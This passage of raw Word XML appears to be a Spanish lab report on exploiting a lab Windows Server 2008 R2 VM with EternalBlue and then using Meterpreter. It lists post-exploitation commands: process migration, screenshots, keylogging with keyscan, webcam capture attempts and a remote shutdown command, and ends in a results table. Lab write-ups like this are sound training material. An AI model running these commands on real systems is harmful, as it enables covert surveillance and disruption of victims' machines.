        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>migrate 5064</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3C72D849" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr>
          <w:left w:val="single" w:color="4F81BD" w:sz="24" w:space="8"/>
        </w:pBdr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>getdesktop</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="333BBB97" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr>
          <w:left w:val="single" w:color="4F81BD" w:sz="24" w:space="8"/>
        </w:pBdr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>screenshot</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5C5AAF3A" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr>
          <w:left w:val="single" w:color="4F81BD" w:sz="24" w:space="8"/>
        </w:pBdr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="25328FB0" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr>
          <w:left w:val="single" w:color="4F81BD" w:sz="24" w:space="8"/>
        </w:pBdr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>whoami</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="51E20807" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr>
          <w:left w:val="single" w:color="4F81BD" w:sz="24" w:space="8"/>
        </w:pBdr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>hostname</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="05E82BC6" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>ipconfig</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="450B8C41" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:jc w:val="start"/>
      </w:pPr>
      <w:r w:rsidR="3F0D89AA">
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="4EBCDEC2" wp14:anchorId="4937F075">
            <wp:extent cx="6391275" cy="3990553"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="Image1" title="Captura de pantalla remot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Image1" title="Captura de pantalla remota"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId2"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm rot="0">
                      <a:off x="0" y="0"/>
                      <a:ext cx="6391275" cy="3990553"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="3F0D89AA">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="3F0D89AA">
        <w:rPr/>
        <w:t xml:space="preserve">Figura 1. Evidencia de la captura remota y de la sesión migrada al usuario vagrant. </w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3173AB98" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading2break"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>4. Pruebas posteriores</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="40D581D4" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="140" w:after="120"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>4.1 Ejecución de comandos</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="448E89A0" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Desde la sesión remota se abrió una consola de Windows y se comprobaron el usuario, el nombre del equipo y la configuración de red.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="730245D1" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:jc w:val="start"/>
      </w:pPr>
      <w:r w:rsidR="3F0D89AA">
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="44EAE949" wp14:anchorId="15C0D4DD">
            <wp:extent cx="6471380" cy="4050529"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="Image2" title="Ejecución de comandos remot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Image2" title="Ejecución de comandos remotos"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId3"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm rot="0">
                      <a:off x="0" y="0"/>
                      <a:ext cx="6471380" cy="4050529"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="3F0D89AA">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="3F0D89AA">
        <w:rPr/>
        <w:t xml:space="preserve">Figura 2. Ejecución de comandos mediante la shell remota de Meterpreter. </w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="200A5CF0" wp14:textId="5F660D3D">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:jc w:val="start"/>
      </w:pPr>
      <w:r w:rsidR="387FBDC7">
        <w:rPr/>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="3F0D89AA">
        <w:rPr/>
        <w:t>Abrir</w:t>
      </w:r>
      <w:r w:rsidR="3F0D89AA">
        <w:rPr/>
        <w:t xml:space="preserve"> video: </w:t>
      </w:r>
      <w:r w:rsidR="3F0D89AA">
        <w:rPr/>
        <w:t>prueba</w:t>
      </w:r>
      <w:r w:rsidR="3F0D89AA">
        <w:rPr/>
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:r w:rsidR="3F0D89AA">
        <w:rPr/>
        <w:t>comandos</w:t>
      </w:r>
      <w:r w:rsidR="3F0D89AA">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="3F0D89AA">
        <w:rPr/>
        <w:t>remotos</w:t>
      </w:r>
      <w:r w:rsidR="41A875CF">
        <w:rPr/>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="315C0217" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="140" w:after="120"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>4.2 Captura de teclado</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6DD77146" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Se utilizaron </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>keyscan_start</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>keyscan_dump</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> y </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>keyscan_stop</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. La prueba logró recuperar parte del texto escrito, aunque el formato incluyó teclas especiales y no resultó completamente limpio.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="02A11063" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:jc w:val="start"/>
      </w:pPr>
      <w:r w:rsidR="3F0D89AA">
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="76AB0F3D" wp14:anchorId="7C5E3161">
            <wp:extent cx="6515276" cy="4096480"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="Image3" title="Captura de texto con keysc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Image3" title="Captura de texto con keyscan"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm rot="0">
                      <a:off x="0" y="0"/>
                      <a:ext cx="6515276" cy="4096480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="3F0D89AA">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="3F0D89AA">
        <w:rPr/>
        <w:t xml:space="preserve">Figura 3. Comparación entre el texto escrito en Windows y los datos recuperados por keyscan. </w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="2FF246D8" wp14:textId="19F049A6">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:jc w:val="start"/>
      </w:pPr>
      <w:r w:rsidR="1CC04E4A">
        <w:rPr/>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="3F0D89AA">
        <w:rPr/>
        <w:t>Abrir</w:t>
      </w:r>
      <w:r w:rsidR="3F0D89AA">
        <w:rPr/>
        <w:t xml:space="preserve"> video: </w:t>
      </w:r>
      <w:r w:rsidR="3F0D89AA">
        <w:rPr/>
        <w:t>prueba</w:t>
      </w:r>
      <w:r w:rsidR="3F0D89AA">
        <w:rPr/>
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:r w:rsidR="3F0D89AA">
        <w:rPr/>
        <w:t>captura</w:t>
      </w:r>
      <w:r w:rsidR="3F0D89AA">
        <w:rPr/>
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:r w:rsidR="3F0D89AA">
        <w:rPr/>
        <w:t>teclado</w:t>
      </w:r>
      <w:r w:rsidR="09EC8201">
        <w:rPr/>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="78EC398F" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="140" w:after="120"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>4.3 Acceso a la cámara</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="2457AC74" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Después de migrar al proceso gráfico </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>explorer.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> con </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>migrate 4576</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, se comprobó el escritorio y se intentó detectar una cámara:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="2D594F42" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr>
          <w:left w:val="single" w:color="4F81BD" w:sz="24" w:space="8"/>
        </w:pBdr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>getdesktop</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="4FDF5758" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr>
          <w:left w:val="single" w:color="4F81BD" w:sz="24" w:space="8"/>
        </w:pBdr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>webcam_list</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="583317B4" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr>
          <w:left w:val="single" w:color="4F81BD" w:sz="24" w:space="8"/>
        </w:pBdr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>webcam_snap -i 1</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="4A39976B" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>webcam_stream -i 1</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="56D78372" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Meterpreter respondió </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>No webcams were found</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> y </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>Target does not have a webcam</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. Aunque la cámara aparecía en la configuración de VirtualBox, Windows Server 2008 R2 no la reconoció. También se comprobó el Extension Pack 7.2.14 y la configuración USB, sin resolver el problema.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="13BBBAAE" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="140" w:after="120"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>4.4 Apagado remoto</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="7FA8C261" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Finalmente se ejecutó un comando de apagado con espera de 30 segundos:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="4E943C56" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>execute -f cmd.exe -a "/c timeout /t 30 /nobreak &amp; shutdown /s /t 0"</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="034C553B" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:jc w:val="start"/>
      </w:pPr>
      <w:r w:rsidR="3F0D89AA">
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="6AB10287" wp14:anchorId="6FEC89E0">
            <wp:extent cx="6478195" cy="4048872"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="Image4" title="Prueba de apagado remo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Image4" title="Prueba de apagado remoto"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm rot="0">
                      <a:off x="0" y="0"/>
                      <a:ext cx="6478195" cy="4048872"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="3F0D89AA">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="3F0D89AA">
        <w:rPr/>
        <w:t xml:space="preserve">Figura 4. Evidencia previa al apagado remoto programado. </w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="4D200E8B" wp14:textId="0A59A154">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:jc w:val="start"/>
      </w:pPr>
      <w:r w:rsidR="320DFA4E">
        <w:rPr/>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="3F0D89AA">
        <w:rPr/>
        <w:t>Abrir</w:t>
      </w:r>
      <w:r w:rsidR="3F0D89AA">
        <w:rPr/>
        <w:t xml:space="preserve"> video: </w:t>
      </w:r>
      <w:r w:rsidR="3F0D89AA">
        <w:rPr/>
        <w:t>prueba</w:t>
      </w:r>
      <w:r w:rsidR="3F0D89AA">
        <w:rPr/>
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:r w:rsidR="3F0D89AA">
        <w:rPr/>
        <w:t>apagado</w:t>
      </w:r>
      <w:r w:rsidR="3F0D89AA">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="3F0D89AA">
        <w:rPr/>
        <w:t>remoto</w:t>
      </w:r>
      <w:r w:rsidR="2002F233">
        <w:rPr/>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0AF61AA2" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:pBdr/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="200" w:after="120"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>5. Resultados</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9524" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="28" w:type="dxa"/>
          <w:start w:w="28" w:type="dxa"/>
          <w:bottom w:w="28" w:type="dxa"/>
          <w:end w:w="28" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2695"/>
        <w:gridCol w:w="6829"/>
      </w:tblGrid>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3C4307C4" wp14:textId="77777777">
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2695" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="590C2371" wp14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:suppressLineNumbers/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="283"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Prueba</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6829" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2EA4B71C" wp14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:suppressLineNumbers/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="283"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Resultado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="2ACF80EC" wp14:textId="77777777">
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2695" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0547A707" wp14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="283"/>
              <w:jc w:val="start"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Conectividad y SMB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6829" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3C1EBB53" wp14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="283"/>
              <w:jc w:val="start"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>El host respondió y el puerto 445 estaba abierto.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="417E0009" wp14:textId="77777777">
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2695" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5C7E65E2" wp14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="283"/>
              <w:jc w:val="start"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>MS17-010 EternalBlue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6829" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4AE71F1C" wp14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="283"/>
              <w:jc w:val="start"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Exitosa. Se abrieron dos sesiones Meterpreter durante la práctica.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="2C0A922A" wp14:textId="77777777">
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2695" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="411357C9" wp14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="283"/>
              <w:jc w:val="start"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Identificación y comandos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6829" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="476B7AB4" wp14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
